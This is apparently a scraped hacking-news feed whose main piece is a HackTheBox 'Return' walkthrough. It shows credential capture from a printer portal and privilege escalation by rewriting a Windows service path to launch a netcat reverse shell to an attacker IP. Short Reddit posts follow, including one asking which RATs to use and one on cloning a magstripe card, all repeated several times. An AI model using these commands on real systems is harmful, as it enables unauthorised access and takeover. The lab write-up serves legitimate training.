Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Return HackTheBox Walkthrough
Return is a Windows machine on HTB and is rated as easy, this box is designed over windows that have Weak Service Permission. If summarized, we will abuse a printer admin portal to get hardcoded credentials through netcat and use them for WinRM login. The printer service account is a member of the Server Operators group which allows one to stop and start some services. Thus, we exploited weak configured services to execute our malicious exe file by abusing the Server Operators' permission.
Table of content· EnumerationPrivilege Escalation· Abusing weak service permissionInitial AccessFirst, we do a Nmap scan of the machine’s IP address to find the open ports and observed some ports are open, from Microsoft Services we understood its Windows Operating System.EnumerationSince port 80 is open, let’s try to access the IP address via a browser. svc-printerand the hardcoded password which has been masked. The server address field is the only field that works as a parameter then the update button is pressed. So the printer is communicating with the local address on port 389. Credential Dumping Once we have replaced the server address from the Attackers IP (Kali Linux), we launched Netcat listener on port 389 on our kali machine. WinRM Valid Account Let’s use evil-winrm to establish a remote connection. This can be done by issuing the command below:___________________________
@hacking_Attack
@Hacking_Video
Return HackTheBox Walkthrough
Return is a Windows machine on HTB and is rated as easy, this box is designed over windows that have Weak Service Permission. If summarized, we will abuse a printer admin portal to get hardcoded credentials through netcat and use them for WinRM login. The printer service account is a member of the Server Operators group which allows one to stop and start some services. Thus, we exploited weak configured services to execute our malicious exe file by abusing the Server Operators' permission.
Table of content· EnumerationPrivilege Escalation· Abusing weak service permissionInitial AccessFirst, we do a Nmap scan of the machine’s IP address to find the open ports and observed some ports are open, from Microsoft Services we understood its Windows Operating System.EnumerationSince port 80 is open, let’s try to access the IP address via a browser. svc-printerand the hardcoded password which has been masked. The server address field is the only field that works as a parameter then the update button is pressed. So the printer is communicating with the local address on port 389. Credential Dumping Once we have replaced the server address from the Attackers IP (Kali Linux), we launched Netcat listener on port 389 on our kali machine. WinRM Valid Account Let’s use evil-winrm to establish a remote connection. This can be done by issuing the command below:___________________________
@hacking_Attack
@Hacking_Video
Blogspot
Return HackTheBox Walkthrough
Hacking Articles is a very interesting blog about information security, penetration testing and vulnerability assessment managed by Raj Chandel.
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Return HackTheBox Walkthrough Return is a Windows machine on HTB and is rated as easy, this box is designed over windows that have Weak Service Permission. If summarized, we will abuse a printer admin portal to get hardcoded…
ivbny40ONFge-w6WnjCQjC1wVRyKTXYo6vmTpDcZq6IIAEp_DyrFVz5Q/s16000/8.png Privilege Escalation <o:pNow that we have access to the machine, let’s verify which user permission or group we have. <o:p
To verify this, we issue the commandnet user svc-printer<o:p
From the screenshot below, we can see that the actual user is a member of the server operatorgroup. <o:p https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6JuVX4J26K252iLBwUQM4mxNQPUbEVLUtO6Q1jkti5cQykkMTyl1FFYDoMAJuV4hm8_ssGPwI9i1IjgPbO46PpU-ciSumMTu9WIkFHeg0Ye_Qm6IhAzL9zWzKx5JjhonVHfmOjWroE7ZA3KFt_K-yDfJhraxYDb5w6gGTAP5K-EUzPpRUbocZQzUpsg/s16000/9.png What can a user with a Server Operators group membership do?<o:p
The server operators can start and stop services. <o:p https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia8YhLQAD-ZjWNCGdw5YtcBFCrCBZru3K-yrBiUpFC6TGMUT7PaHg4SrmS1ToGcqNyziw7oSOtbXKtR7In00e1VPde9fMH9JAkTX2VuPDL_2xUfmlPcuO7aS2mqgs-FnT-qbtrmlzMLyx_zN2Manld6H-ukxzGr49e4Pe7E1Fooo2vQGNK6PyzZxP7dA/s16000/10.png The server Operator group is considered as a service administrator and can change binaries that are installed on the domain controller, read more from here. <o:p upload /usr/share/windows-binaries<o:pThus, we first uploaded the nc.exe windows binaries file and then enumerate for installed services for further exploitation. <o:p services<o:pwe found a list of installed services and their path along with true/false flags for privileges.<o:p https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGse_wongHJC9xqlrbH6Sklc57ve4xfr70-xLmN7cr35jHQJ9wwn4hEdXiQLHAqE4jWmKoKlmgNNzRrssDvVghSAVI4D-Q-n4Mq0ZHjUuDVNkJt9yiGAHnAQA89q4mR55mvP5etNxlCBkAFlyyxqsc0NfyE3V0h-nPE5_-hgjQKGFilT4dpDqspKnT0A/s16000/11.png Abusing Weak Service Permission<o:pHere we need to analyse which binary path we can modify to execute nc.exe file <o:p
First, we try windows defender to change the binary path for WinDefend but got an access denied error. <o:p sc.exe config WinDefend binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234"<o:pThen we try to modify the binary path for VMTools and finally this worked for us. <o:p sc.exe config VMTools binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234"<o:phttps://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnXZf0fpFSQM8xcF0JJEkkml812FoVYRsY50b3ADmfqNGfFbu0qBnMEEWsv--YetbpapBkrEfh4x6XS6gFjWJQPC5Gwkmy-lDhugnuPAJKpViCv1xyK2ANUxhVtYzBJDG53JFksz6aftoygWog_GKNFQaWZImLfBINXGOMuKuZBLN9-G_vlY2R0UDG9A/s16000/12.png <o:p
Since SVC-printer is a member of the server operator thus we can restart the service to get the reverse connection. So, let's stop and start the service VMTools by issuing the command: <o:p
sc.exe stop VMTools<o:p
sc.exe start VMTools<o:p
<o:p https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdMkwu9XoP8zyzwv_XBRLsXYe2a1okCwgJYah_rQ8ToviQwx5471DE729ItO4pHZD6HVz1Vu9-8uZjuBPDUb4_ob1yWjXHp-40inI0SYz5rgtQCjTi2sB4Xy4COKxsH9fFuwnvFdtpY5Nty7fKATnW-Wvtg_qE8CtrujZpLCwh5vkSMfxdhMyakaIVrw/s16000/13.png <o:p
Before start the service VMTools, we make sure that the netcat is listening on port 1234 as shown below. <o:p
Once the service is stop and get start, we got netcat session as obtain Root flag. J<o:p https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaSE-VRpB650T4fiy8uuQ7RMKc_JkmKDuh_4v2sPxfOsjwTlYYASafVRv9uGjstmUsIZq39AeNPG0tejbLWFxN3PK-Ichoic2t3xkyMBqMpUxuK1nidEHKaY2W9-2fMQ-AIXyA6YyduFsiDELXoBw6ch8ahMU_S4B4GMsNIUHxFJWa2wwHAkGZZlKDiA/s16000/15.png
To verify this, we issue the commandnet user svc-printer<o:p
From the screenshot below, we can see that the actual user is a member of the server operatorgroup. <o:p https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6JuVX4J26K252iLBwUQM4mxNQPUbEVLUtO6Q1jkti5cQykkMTyl1FFYDoMAJuV4hm8_ssGPwI9i1IjgPbO46PpU-ciSumMTu9WIkFHeg0Ye_Qm6IhAzL9zWzKx5JjhonVHfmOjWroE7ZA3KFt_K-yDfJhraxYDb5w6gGTAP5K-EUzPpRUbocZQzUpsg/s16000/9.png What can a user with a Server Operators group membership do?<o:p
The server operators can start and stop services. <o:p https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia8YhLQAD-ZjWNCGdw5YtcBFCrCBZru3K-yrBiUpFC6TGMUT7PaHg4SrmS1ToGcqNyziw7oSOtbXKtR7In00e1VPde9fMH9JAkTX2VuPDL_2xUfmlPcuO7aS2mqgs-FnT-qbtrmlzMLyx_zN2Manld6H-ukxzGr49e4Pe7E1Fooo2vQGNK6PyzZxP7dA/s16000/10.png The server Operator group is considered as a service administrator and can change binaries that are installed on the domain controller, read more from here. <o:p upload /usr/share/windows-binaries<o:pThus, we first uploaded the nc.exe windows binaries file and then enumerate for installed services for further exploitation. <o:p services<o:pwe found a list of installed services and their path along with true/false flags for privileges.<o:p https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGse_wongHJC9xqlrbH6Sklc57ve4xfr70-xLmN7cr35jHQJ9wwn4hEdXiQLHAqE4jWmKoKlmgNNzRrssDvVghSAVI4D-Q-n4Mq0ZHjUuDVNkJt9yiGAHnAQA89q4mR55mvP5etNxlCBkAFlyyxqsc0NfyE3V0h-nPE5_-hgjQKGFilT4dpDqspKnT0A/s16000/11.png Abusing Weak Service Permission<o:pHere we need to analyse which binary path we can modify to execute nc.exe file <o:p
First, we try windows defender to change the binary path for WinDefend but got an access denied error. <o:p sc.exe config WinDefend binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234"<o:pThen we try to modify the binary path for VMTools and finally this worked for us. <o:p sc.exe config VMTools binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234"<o:phttps://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnXZf0fpFSQM8xcF0JJEkkml812FoVYRsY50b3ADmfqNGfFbu0qBnMEEWsv--YetbpapBkrEfh4x6XS6gFjWJQPC5Gwkmy-lDhugnuPAJKpViCv1xyK2ANUxhVtYzBJDG53JFksz6aftoygWog_GKNFQaWZImLfBINXGOMuKuZBLN9-G_vlY2R0UDG9A/s16000/12.png <o:p
Since SVC-printer is a member of the server operator thus we can restart the service to get the reverse connection. So, let's stop and start the service VMTools by issuing the command: <o:p
sc.exe stop VMTools<o:p
sc.exe start VMTools<o:p
<o:p https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdMkwu9XoP8zyzwv_XBRLsXYe2a1okCwgJYah_rQ8ToviQwx5471DE729ItO4pHZD6HVz1Vu9-8uZjuBPDUb4_ob1yWjXHp-40inI0SYz5rgtQCjTi2sB4Xy4COKxsH9fFuwnvFdtpY5Nty7fKATnW-Wvtg_qE8CtrujZpLCwh5vkSMfxdhMyakaIVrw/s16000/13.png <o:p
Before start the service VMTools, we make sure that the netcat is listening on port 1234 as shown below. <o:p
Once the service is stop and get start, we got netcat session as obtain Root flag. J<o:p https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaSE-VRpB650T4fiy8uuQ7RMKc_JkmKDuh_4v2sPxfOsjwTlYYASafVRv9uGjstmUsIZq39AeNPG0tejbLWFxN3PK-Ichoic2t3xkyMBqMpUxuK1nidEHKaY2W9-2fMQ-AIXyA6YyduFsiDELXoBw6ch8ahMU_S4B4GMsNIUHxFJWa2wwHAkGZZlKDiA/s16000/15.png
Dark Reading: Attacks/Breaches
Mastercard To Bring Crypto Trading Capabilities To Banks
New Crypto Source program extends Mastercard’s safe, secure, and trusted services.
___________________________
@hacking_Attack
@Hacking_Video
Mastercard To Bring Crypto Trading Capabilities To Banks
New Crypto Source program extends Mastercard’s safe, secure, and trusted services.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Mastercard To Bring Crypto Trading Capabilities To Banks
New Crypto Source program extends Mastercard’s safe, secure, and trusted services.
hacking: security in practice
Streaming Apps Break Auto Login
I am trying to sign into a different account to assorted streaming services. When I choose my provider it finds the wrong account and says I need to upgrade my cable subscription. I have log in credentials for streaming video services. How do I break the automatic cycle and put in the credentials I know will provide entry to the app?
submitted by /u/supergokogt
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Streaming Apps Break Auto Login
I am trying to sign into a different account to assorted streaming services. When I choose my provider it finds the wrong account and says I need to upgrade my cable subscription. I have log in credentials for streaming video services. How do I break the automatic cycle and put in the credentials I know will provide entry to the app?
submitted by /u/supergokogt
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Streaming Apps Break Auto Login
I am trying to sign into a different account to assorted streaming services. When I choose my provider it finds the wrong account and says I need...
hacking: security in practice
Decentralized, private and anonymous
I know of some apps/systems that enable/support 1 or 2 of the 3 requirements but NOT ALL 3:
Decentralized: no central authority not central servers are needed to support the operation. It's totally distributed.
Private: the content shared on this platform is encrypted.
Anonymous: from the outside, it's impossible to know who's sending messages to who
I've also read thesis about systems like this but I couldn't find any LIVE system that ticks all these 3 boxes.
Ideas? Suggestions?
submitted by /u/iambrunocoelho
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Decentralized, private and anonymous
I know of some apps/systems that enable/support 1 or 2 of the 3 requirements but NOT ALL 3:
Decentralized: no central authority not central servers are needed to support the operation. It's totally distributed.
Private: the content shared on this platform is encrypted.
Anonymous: from the outside, it's impossible to know who's sending messages to who
I've also read thesis about systems like this but I couldn't find any LIVE system that ticks all these 3 boxes.
Ideas? Suggestions?
submitted by /u/iambrunocoelho
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Decentralized, private and anonymous
I know of some apps/systems that enable/support 1 or 2 of the 3 requirements but NOT ALL 3: Decentralized: no central authority not central...
hacking: security in practice
hello i have a problem
3c9UThR53fT9bwfdh1yHxWPvjJIJqU4BGaSxG3jtCqYBI8cAR0DTsTQ3NiyN HMrGREFasnkkBMannJjGbkwesrlRyU6KnlIpC6SIcwvKRXmuUSyyESqnU2Ix WpfW8Ki9RqQfYETBSVKtJ9fXb0FjIZHYqFGAqOpH FUFMwI1A9ddRSgS1XiJXb3371tOnuvLql6YV7r8N
i need this encrypted code to be decrypted it says its base 62 but put decrypted not a word is recognizable, for context this is a part of and ARG from Escape From Tarkov.
(edit: fixed the code put in the worng one)
submitted by /u/pizzapastaputitinabo
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
hello i have a problem
3c9UThR53fT9bwfdh1yHxWPvjJIJqU4BGaSxG3jtCqYBI8cAR0DTsTQ3NiyN HMrGREFasnkkBMannJjGbkwesrlRyU6KnlIpC6SIcwvKRXmuUSyyESqnU2Ix WpfW8Ki9RqQfYETBSVKtJ9fXb0FjIZHYqFGAqOpH FUFMwI1A9ddRSgS1XiJXb3371tOnuvLql6YV7r8N
i need this encrypted code to be decrypted it says its base 62 but put decrypted not a word is recognizable, for context this is a part of and ARG from Escape From Tarkov.
(edit: fixed the code put in the worng one)
submitted by /u/pizzapastaputitinabo
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
hello i have a problem
3c9UThR53fT9bwfdh1yHxWPvjJIJqU4BGaSxG3jtCqYBI 8cAR0DTsTQ3NiyNHMrGREFasnkkBMannJjGbkwesrlRyU 6KnlIpC6SIcwvKRXmuUSyyESqnU2IxWpfW8Ki9RqQfYET...
Hacking on Medium
How to get into Hacking
This will be a very honest post to anyone who has recently asked the question in the title. And what I’m about to write will be very…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
How to get into Hacking
This will be a very honest post to anyone who has recently asked the question in the title. And what I’m about to write will be very…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to get into Hacking
This will be a very honest post to anyone who has recently asked the question in the title. And what I’m about to write will be very…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Social Engineering: Hacking The Mind (For Millions Of Dollars)
https://cdn-images-1.medium.com/max/1170/1*hYz6Tpv6PsiqinucFfb9mA.jpeg
TL;DR-Learn about the top hacks using social engineering, as well as a background on the term and what it means in present-day…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Social Engineering: Hacking The Mind (For Millions Of Dollars)
https://cdn-images-1.medium.com/max/1170/1*hYz6Tpv6PsiqinucFfb9mA.jpeg
TL;DR-Learn about the top hacks using social engineering, as well as a background on the term and what it means in present-day…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Social Engineering: Hacking The Mind (For Millions Of Dollars)
TL;DR-Learn about the top hacks using social engineering, as well as a background on the term and what it means in present-day…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Nuevo malware PHP distribuido como aplicaciones crackeadas de Microsoft Office, Telegram y otros
https://cdn-images-1.medium.com/max/1310/0*QHs9_VYNegKU0ZXX
El equipo de investigación de Zscaler ThreatLabz observó una versión PHP de ‘Ducktail’ Infostealer distribuida en forma de instalador de…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Nuevo malware PHP distribuido como aplicaciones crackeadas de Microsoft Office, Telegram y otros
https://cdn-images-1.medium.com/max/1310/0*QHs9_VYNegKU0ZXX
El equipo de investigación de Zscaler ThreatLabz observó una versión PHP de ‘Ducktail’ Infostealer distribuida en forma de instalador de…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Nuevo malware PHP distribuido como aplicaciones crackeadas de Microsoft Office, Telegram y otros
El equipo de investigación de Zscaler ThreatLabz observó una versión PHP de ‘Ducktail’ Infostealer distribuida en forma de instalador de…
Reverse nslookup results
https://www.reddit.com/r/Pentesting/comments/y7q2rj/reverse_nslookup_results/
I'm currently doing a web app pen test and did a reverse nslookup on public ip of the load balancer. It returned the url for almost 30 other apps maintained by the organization. Is this a finding? Is there a way to obfuscate those results? submitted by /u/Peesha_Deel (https://www.reddit.com/user/Peesha_Deel)
[link] (https://www.reddit.com/r/Pentesting/comments/y7q2rj/reverse_nslookup_results/) [comments] (https://www.reddit.com/r/Pentesting/comments/y7q2rj/reverse_nslookup_results/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/y7q2rj/reverse_nslookup_results/
I'm currently doing a web app pen test and did a reverse nslookup on public ip of the load balancer. It returned the url for almost 30 other apps maintained by the organization. Is this a finding? Is there a way to obfuscate those results? submitted by /u/Peesha_Deel (https://www.reddit.com/user/Peesha_Deel)
[link] (https://www.reddit.com/r/Pentesting/comments/y7q2rj/reverse_nslookup_results/) [comments] (https://www.reddit.com/r/Pentesting/comments/y7q2rj/reverse_nslookup_results/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Reverse nslookup results
I'm currently doing a web app pen test and did a reverse nslookup on public ip of the load balancer. It returned the url for almost 30 other apps...
hacking: security in practice
Career in info-sec?
I’m currently attending college working on a degree in compsci/ information systems security, while obtaining industry certifications in the process. Does anyone here working in the field enjoy their career? What challenges would I have obtaining employment? Or is it even worth it?
submitted by /u/trollingguru
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Career in info-sec?
I’m currently attending college working on a degree in compsci/ information systems security, while obtaining industry certifications in the process. Does anyone here working in the field enjoy their career? What challenges would I have obtaining employment? Or is it even worth it?
submitted by /u/trollingguru
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Career in info-sec?
I’m currently attending college working on a degree in compsci/ information systems security, while obtaining industry certifications in the...
hacking: security in practice
Rats?
Im just curious what kind of rats people use. What you recommend.
submitted by /u/ChimpionYT
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Rats?
Im just curious what kind of rats people use. What you recommend.
submitted by /u/ChimpionYT
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Rats?
Im just curious what kind of rats people use. What you recommend.
hacking: security in practice
clone magstripe
hey! how can i clone a mag strip card. it’s a gift card but i linked it to my account so now its basically like a rewards card. i’d like to make about 4 copies.
edit: I KNOW IT WILL NOT CLONE THE VALUE. the card is reloadable and i want to have multiple cards that will all use the same balance/ account points
(kinda embarrassing but it’s a starbucks card
submitted by /u/KaptainTyler
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
clone magstripe
hey! how can i clone a mag strip card. it’s a gift card but i linked it to my account so now its basically like a rewards card. i’d like to make about 4 copies.
edit: I KNOW IT WILL NOT CLONE THE VALUE. the card is reloadable and i want to have multiple cards that will all use the same balance/ account points
(kinda embarrassing but it’s a starbucks card
submitted by /u/KaptainTyler
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
[deleted by user] : r/hacking
155 votes, 110 comments. 2.9M subscribers in the hacking community. A subreddit dedicated to hacking and hackers.
Constructive collaboration and learning about exploits, industry standards, grey and white hat hacking, new hardware and software hacking technology…
Constructive collaboration and learning about exploits, industry standards, grey and white hat hacking, new hardware and software hacking technology…